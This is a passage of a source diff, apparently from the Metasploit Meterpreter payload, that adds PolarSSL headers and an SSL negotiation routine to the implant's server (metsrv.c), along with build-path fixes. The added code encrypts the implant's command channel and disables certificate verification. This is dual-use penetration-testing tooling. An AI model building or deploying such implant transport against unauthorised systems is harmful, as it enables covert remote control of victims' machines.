int ssl_handshake_server( ssl_context *ssl );
int ssl_derive_keys( ssl_context *ssl );
void ssl_calc_verify( ssl_context *ssl, unsigned char hash[36] );
int ssl_read_record( ssl_context *ssl );
int ssl_fetch_input( ssl_context *ssl, int nb_want );
int ssl_write_record( ssl_context *ssl );
int ssl_flush_output( ssl_context *ssl );
int ssl_parse_certificate( ssl_context *ssl );
int ssl_write_certificate( ssl_context *ssl );
int ssl_parse_change_cipher_spec( ssl_context *ssl );
int ssl_write_change_cipher_spec( ssl_context *ssl );
int ssl_parse_finished( ssl_context *ssl );
int ssl_write_finished( ssl_context *ssl );
#ifdef __cplusplus
}
#endif
#endif /* ssl.h */

68
c/meterpreter/source/common/polarssl/timing.h Normal file

@ -0,0 +1,68 @@
/**
* \file timing.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_TIMING_H
#define POLARSSL_TIMING_H
/**
* \brief timer structure
*/
struct hr_time
{
unsigned char opaque[32];
};
#ifdef __cplusplus
extern "C" {
#endif
extern int alarmed;
/**
* \brief Return the CPU cycle counter value
*/
unsigned long hardclock( void );
/**
* \brief Return the elapsed time in milliseconds
*
* \param val points to a timer structure
* \param reset if set to 1, the timer is restarted
*/
unsigned long get_timer( struct hr_time *val, int reset );
/**
* \brief Setup an alarm clock
*
* \param seconds delay before the "alarmed" flag is set
*/
void set_alarm( int seconds );
/**
* \brief Sleep for a certain amount of time
*/
void m_sleep( int milliseconds );
#ifdef __cplusplus
}
#endif
#endif /* timing.h */

391
c/meterpreter/source/common/polarssl/x509.h Normal file

@ -0,0 +1,391 @@
/**
* \file x509.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_X509_H
#define POLARSSL_X509_H
#include "polarssl/rsa.h"
#define POLARSSL_ERR_ASN1_OUT_OF_DATA -0x0014
#define POLARSSL_ERR_ASN1_UNEXPECTED_TAG -0x0016
#define POLARSSL_ERR_ASN1_INVALID_LENGTH -0x0018
#define POLARSSL_ERR_ASN1_LENGTH_MISMATCH -0x001A
#define POLARSSL_ERR_ASN1_INVALID_DATA -0x001C
#define POLARSSL_ERR_X509_FEATURE_UNAVAILABLE -0x0020
#define POLARSSL_ERR_X509_CERT_INVALID_PEM -0x0040
#define POLARSSL_ERR_X509_CERT_INVALID_FORMAT -0x0060
#define POLARSSL_ERR_X509_CERT_INVALID_VERSION -0x0080
#define POLARSSL_ERR_X509_CERT_INVALID_SERIAL -0x00A0
#define POLARSSL_ERR_X509_CERT_INVALID_ALG -0x00C0
#define POLARSSL_ERR_X509_CERT_INVALID_NAME -0x00E0
#define POLARSSL_ERR_X509_CERT_INVALID_DATE -0x0100
#define POLARSSL_ERR_X509_CERT_INVALID_PUBKEY -0x0120
#define POLARSSL_ERR_X509_CERT_INVALID_SIGNATURE -0x0140
#define POLARSSL_ERR_X509_CERT_INVALID_EXTENSIONS -0x0160
#define POLARSSL_ERR_X509_CERT_UNKNOWN_VERSION -0x0180
#define POLARSSL_ERR_X509_CERT_UNKNOWN_SIG_ALG -0x01A0
#define POLARSSL_ERR_X509_CERT_UNKNOWN_PK_ALG -0x01C0
#define POLARSSL_ERR_X509_CERT_SIG_MISMATCH -0x01E0
#define POLARSSL_ERR_X509_CERT_VERIFY_FAILED -0x0200
#define POLARSSL_ERR_X509_KEY_INVALID_PEM -0x0220
#define POLARSSL_ERR_X509_KEY_INVALID_VERSION -0x0240
#define POLARSSL_ERR_X509_KEY_INVALID_FORMAT -0x0260
#define POLARSSL_ERR_X509_KEY_INVALID_ENC_IV -0x0280
#define POLARSSL_ERR_X509_KEY_UNKNOWN_ENC_ALG -0x02A0
#define POLARSSL_ERR_X509_KEY_PASSWORD_REQUIRED -0x02C0
#define POLARSSL_ERR_X509_KEY_PASSWORD_MISMATCH -0x02E0
#define POLARSSL_ERR_X509_POINT_ERROR -0x0300
#define POLARSSL_ERR_X509_VALUE_TO_LENGTH -0x0320
#define BADCERT_EXPIRED 1
#define BADCERT_REVOKED 2
#define BADCERT_CN_MISMATCH 4
#define BADCERT_NOT_TRUSTED 8
#define BADCRL_NOT_TRUSTED 16
#define BADCRL_EXPIRED 32
/*
* DER constants
*/
#define ASN1_BOOLEAN 0x01
#define ASN1_INTEGER 0x02
#define ASN1_BIT_STRING 0x03
#define ASN1_OCTET_STRING 0x04
#define ASN1_NULL 0x05
#define ASN1_OID 0x06
#define ASN1_UTF8_STRING 0x0C
#define ASN1_SEQUENCE 0x10
#define ASN1_SET 0x11
#define ASN1_PRINTABLE_STRING 0x13
#define ASN1_T61_STRING 0x14
#define ASN1_IA5_STRING 0x16
#define ASN1_UTC_TIME 0x17
#define ASN1_UNIVERSAL_STRING 0x1C
#define ASN1_BMP_STRING 0x1E
#define ASN1_PRIMITIVE 0x00
#define ASN1_CONSTRUCTED 0x20
#define ASN1_CONTEXT_SPECIFIC 0x80
/*
* various object identifiers
*/
#define X520_COMMON_NAME 3
#define X520_COUNTRY 6
#define X520_LOCALITY 7
#define X520_STATE 8
#define X520_ORGANIZATION 10
#define X520_ORG_UNIT 11
#define PKCS9_EMAIL 1
#define X509_OUTPUT_DER 0x01
#define X509_OUTPUT_PEM 0x02
#define PEM_LINE_LENGTH 72
#define X509_ISSUER 0x01
#define X509_SUBJECT 0x02
#define OID_X520 "\x55\x04"
#define OID_CN "\x55\x04\x03"
#define OID_PKCS1 "\x2A\x86\x48\x86\xF7\x0D\x01\x01"
#define OID_PKCS1_RSA "\x2A\x86\x48\x86\xF7\x0D\x01\x01\x01"
#define OID_PKCS1_RSA_SHA "\x2A\x86\x48\x86\xF7\x0D\x01\x01\x05"
#define OID_PKCS9 "\x2A\x86\x48\x86\xF7\x0D\x01\x09"
#define OID_PKCS9_EMAIL "\x2A\x86\x48\x86\xF7\x0D\x01\x09\x01"
/*
* Structures for parsing X.509 certificates
*/
typedef struct _x509_buf
{
int tag;
int len;
unsigned char *p;
}
x509_buf;
typedef struct _x509_name
{
x509_buf oid;
x509_buf val;
struct _x509_name *next;
}
x509_name;
typedef struct _x509_time
{
int year, mon, day;
int hour, min, sec;
}
x509_time;
typedef struct _x509_cert
{
x509_buf raw;
x509_buf tbs;
int version;
x509_buf serial;
x509_buf sig_oid1;
x509_buf issuer_raw;
x509_buf subject_raw;
x509_name issuer;
x509_name subject;
x509_time valid_from;
x509_time valid_to;
x509_buf pk_oid;
rsa_context rsa;
x509_buf issuer_id;
x509_buf subject_id;
x509_buf v3_ext;
int ca_istrue;
int max_pathlen;
x509_buf sig_oid2;
x509_buf sig;
struct _x509_cert *next;
}
x509_cert;
typedef struct _x509_crl_entry
{
x509_buf raw;
x509_buf serial;
x509_time revocation_date;
x509_buf entry_ext;
struct _x509_crl_entry *next;
}
x509_crl_entry;
typedef struct _x509_crl
{
x509_buf raw;
x509_buf tbs;
int version;
x509_buf sig_oid1;
x509_buf issuer_raw;
x509_name issuer;
x509_time this_update;
x509_time next_update;
x509_crl_entry entry;
x509_buf crl_ext;
x509_buf sig_oid2;
x509_buf sig;
struct _x509_crl *next;
}
x509_crl;
/*
* Structures for writing X.509 certificates
*/
typedef struct _x509_node
{
unsigned char *data;
unsigned char *p;
unsigned char *end;
size_t len;
}
x509_node;
typedef struct _x509_raw
{
x509_node raw;
x509_node tbs;
x509_node version;
x509_node serial;
x509_node tbs_signalg;
x509_node issuer;
x509_node validity;
x509_node subject;
x509_node subpubkey;
x509_node signalg;
x509_node sign;
}
x509_raw;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief Parse one or more certificates and add them
* to the chained list
*
* \param chain points to the start of the chain
* \param buf buffer holding the certificate data
* \param buflen size of the buffer
*
* \return 0 if successful, or a specific X509 error code
*/
int x509parse_crt( x509_cert *chain, unsigned char *buf, int buflen );
/**
* \brief Load one or more certificates and add them
* to the chained list
*
* \param chain points to the start of the chain
* \param path filename to read the certificates from
*
* \return 0 if successful, or a specific X509 error code
*/
int x509parse_crtfile( x509_cert *chain, char *path );
/**
* \brief Parse one or more CRLs and add them
* to the chained list
*
* \param chain points to the start of the chain
* \param buf buffer holding the CRL data
* \param buflen size of the buffer
*
* \return 0 if successful, or a specific X509 error code
*/
int x509parse_crl( x509_crl *chain, unsigned char *buf, int buflen );
/**
* \brief Load one or more CRLs and add them
* to the chained list
*
* \param chain points to the start of the chain
* \param path filename to read the CRLs from
*
* \return 0 if successful, or a specific X509 error code
*/
int x509parse_crlfile( x509_crl *chain, char *path );
/**
* \brief Parse a private RSA key
*
* \param rsa RSA context to be initialized
* \param buf input buffer
* \param buflen size of the buffer
* \param pwd password for decryption (optional)
* \param pwdlen size of the password
*
* \return 0 if successful, or a specific X509 error code
*/
int x509parse_key( rsa_context *rsa,
unsigned char *buf, int buflen,
unsigned char *pwd, int pwdlen );
/**
* \brief Load and parse a private RSA key
*
* \param rsa RSA context to be initialized
* \param path filename to read the private key from
* \param pwd password to decrypt the file (can be NULL)
*
* \return 0 if successful, or a specific X509 error code
*/
int x509parse_keyfile( rsa_context *rsa, char *path, char *password );
/**
* \brief Store the certificate DN in printable form into buf;
* no more than size characters will be written.
*/
int x509parse_dn_gets( char *buf, size_t size, x509_name *dn );
/**
* \brief Returns an informational string about the
* certificate.
*/
int x509parse_cert_info( char *buf, size_t size, char *prefix, x509_cert *crt );
/**
* \brief Returns an informational string about the
* CRL.
*/
int x509parse_crl_info( char *buf, size_t size, char *prefix, x509_crl *crl );
/**
* \brief Return 0 if the x509_time is still valid,
* or 1 otherwise.
*/
int x509parse_time_expired( x509_time *time );
/**
* \brief Verify the certificate signature
*
* \param crt a certificate to be verified
* \param trust_ca the trusted CA chain
* \param ca_crl the CRL chain for trusted CA's
* \param cn expected Common Name (can be set to
* NULL if the CN must not be verified)
* \param flags result of the verification
*
* \return 0 if successful or POLARSSL_ERR_X509_SIG_VERIFY_FAILED,
* in which case *flags will have one or more of
* the following values set:
* BADCERT_EXPIRED --
* BADCERT_REVOKED --
* BADCERT_CN_MISMATCH --
* BADCERT_NOT_TRUSTED
*
* \note TODO: add two arguments, depth and crl
*/
int x509parse_verify( x509_cert *crt,
x509_cert *trust_ca,
x509_crl *ca_crl,
char *cn, int *flags );
/**
* \brief Unallocate all certificate data
*/
void x509_free( x509_cert *crt );
/**
* \brief Unallocate all CRL data
*/
void x509_crl_free( x509_crl *crl );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int x509_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* x509.h */

74
c/meterpreter/source/common/polarssl/xtea.h Normal file

@ -0,0 +1,74 @@
/**
* \file xtea.h
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_XTEA_H
#define POLARSSL_XTEA_H
#include <inttypes.h>
#define XTEA_ENCRYPT 1
#define XTEA_DECRYPT 0
/**
* \brief XTEA context structure
*/
typedef struct
{
uint32_t k[4]; /*!< key */
}
xtea_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief XTEA key schedule
*
* \param ctx XTEA context to be initialized
* \param key the secret key
*/
void xtea_setup( xtea_context *ctx, unsigned char key[16] );
/**
* \brief XTEA cipher function
*
* \param ctx XTEA context
* \param mode XTEA_ENCRYPT or XTEA_DECRYPT
* \param input 8-byte input block
* \param output 8-byte output block
*/
void xtea_crypt( xtea_context *ctx,
int mode,
unsigned char input[8],
unsigned char output[8] );
/*
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int xtea_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* xtea.h */

2
c/meterpreter/source/common/remote.h

@ -13,6 +13,8 @@ typedef struct _Remote
HMODULE hMetSrv;
SOCKET fd;
CryptoContext *crypto;
ssl_context ssl;
ssl_session ssn;
} Remote;
Remote *remote_allocate(SOCKET fd);

42
c/meterpreter/source/server/metsrv.c

@ -1,4 +1,8 @@
#include "metsrv.h"
// include the PolarSSL library
#pragma comment(lib,"polarssl.lib")
// include the Reflectiveloader() function
#include "../ReflectiveDLLInjection/ReflectiveLoader.c"
@ -39,6 +43,9 @@ DWORD __declspec(dllexport) Init(SOCKET fd)
// processes
SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0);
// Initialize SSL on the socket
negotiate_ssl(remote);
// Register extension dispatch routines
register_dispatch_routines();
@ -50,12 +57,45 @@ DWORD __declspec(dllexport) Init(SOCKET fd)
} while (0);
ssl_close_notify(&remote->ssl);
ssl_free(&remote->ssl);
if (remote)
remote_deallocate(remote);
return res;
}
/*
* Monitor for requests and local waitable items in the scheduler
*/
DWORD negotiate_ssl(Remote *remote)
{
DWORD hres = ERROR_SUCCESS;
SOCKET fd = remote_get_fd(remote);
fd_set fdread;
havege_state hs;
ssl_context *ssl = &remote->ssl;
ssl_session *ssn = &remote->ssn;
havege_init( &hs );
memset( ssn, 0, sizeof( ssl_session ) );
if(ssl_init(ssl) != 0 ) return(1);
ssl_set_endpoint( ssl, SSL_IS_CLIENT );
ssl_set_authmode( ssl, SSL_VERIFY_NONE );
ssl_set_rng( ssl, havege_rand, &hs );
ssl_set_bio( ssl, net_recv, &fd, net_send, &fd );
ssl_set_ciphers( ssl, ssl_default_ciphers );
ssl_set_session( ssl, 1, 60000, ssn );
/* This wakes up the ssl.accept() on the remote side */
ssl_write(ssl, "GET / HTTP/1.0\r\n\r\n", 18);
return(0);
}
/*
* Monitor for requests and local waitable items in the scheduler
*/
@ -64,7 +104,7 @@ DWORD monitor_loop(Remote *remote)
DWORD hres = ERROR_SUCCESS;
SOCKET fd = remote_get_fd(remote);
fd_set fdread;
/*
* Read data locally and remotely
*/

3
c/meterpreter/workspace/common/common.vcproj

@ -117,8 +117,9 @@
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
Optimization="1"
InlineFunctionExpansion="1"
FavorSizeOrSpeed="2"
PreprocessorDefinitions="NDEBUG;WIN32;_LIB;USE_DLL;METERPRETER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
StringPooling="true"
RuntimeLibrary="0"

2
c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcproj

@ -177,7 +177,7 @@
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;$(ProjectDir)\release\*.dll&quot; &quot;$(ProjectDir)..\output\&quot;"
CommandLine="copy /y &quot;$(ProjectDir)\release\*.dll&quot; &quot;$(ProjectDir)..\..\output\&quot;"
/>
</Configuration>
</Configurations>

2
c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcproj

@ -112,7 +112,7 @@
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;$(ProjectDir)\release\*.dll&quot; &quot;$(ProjectDir)..\output\&quot;"
CommandLine="copy /y &quot;$(ProjectDir)\release\*.dll&quot; &quot;$(ProjectDir)..\..\output\&quot;"
/>
</Configuration>
<Configuration

2
c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcproj

@ -212,7 +212,7 @@
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;$(ProjectDir)\release\*.dll&quot; &quot;$(ProjectDir)..\output\&quot;"
CommandLine="copy /y &quot;$(ProjectDir)\release\*.dll&quot; &quot;$(ProjectDir)..\..\output\&quot;"
/>
</Configuration>
</Configurations>

2
c/meterpreter/workspace/metcli/metcli.vcproj

@ -202,7 +202,7 @@
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;$(ProjectDir)\release\metcli.exe&quot; &quot;$(ProjectDir)..\output\&quot;"
CommandLine="copy /y &quot;$(ProjectDir)\release\metcli.exe&quot; &quot;$(ProjectDir)..\..\output\&quot;"
/>
</Configuration>
</Configurations>

2
c/meterpreter/workspace/metsrv/metsrv.vcproj

@ -212,7 +212,7 @@
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;$(ProjectDir)\release\metsrv.dll&quot; &quot;$(ProjectDir)..\output\&quot;"
CommandLine="copy /y &quot;$(ProjectDir)\release\metsrv.dll&quot; &quot;$(ProjectDir)..\..\output\&quot;"
/>
</Configuration>
</Configurations>